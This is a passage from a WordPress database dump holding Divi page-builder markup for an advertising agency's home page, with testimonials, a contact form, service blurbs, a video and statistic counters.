animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-18 20:57:43','2020-07-18 20:57:43','',134,'https://52.66.212.87/2020/07/18/134-revision-v1/',0,'revision','',0),(340,1,'2020-07-18 21:00:43','2020-07-18 21:00:43','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Best Agency to choose\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" 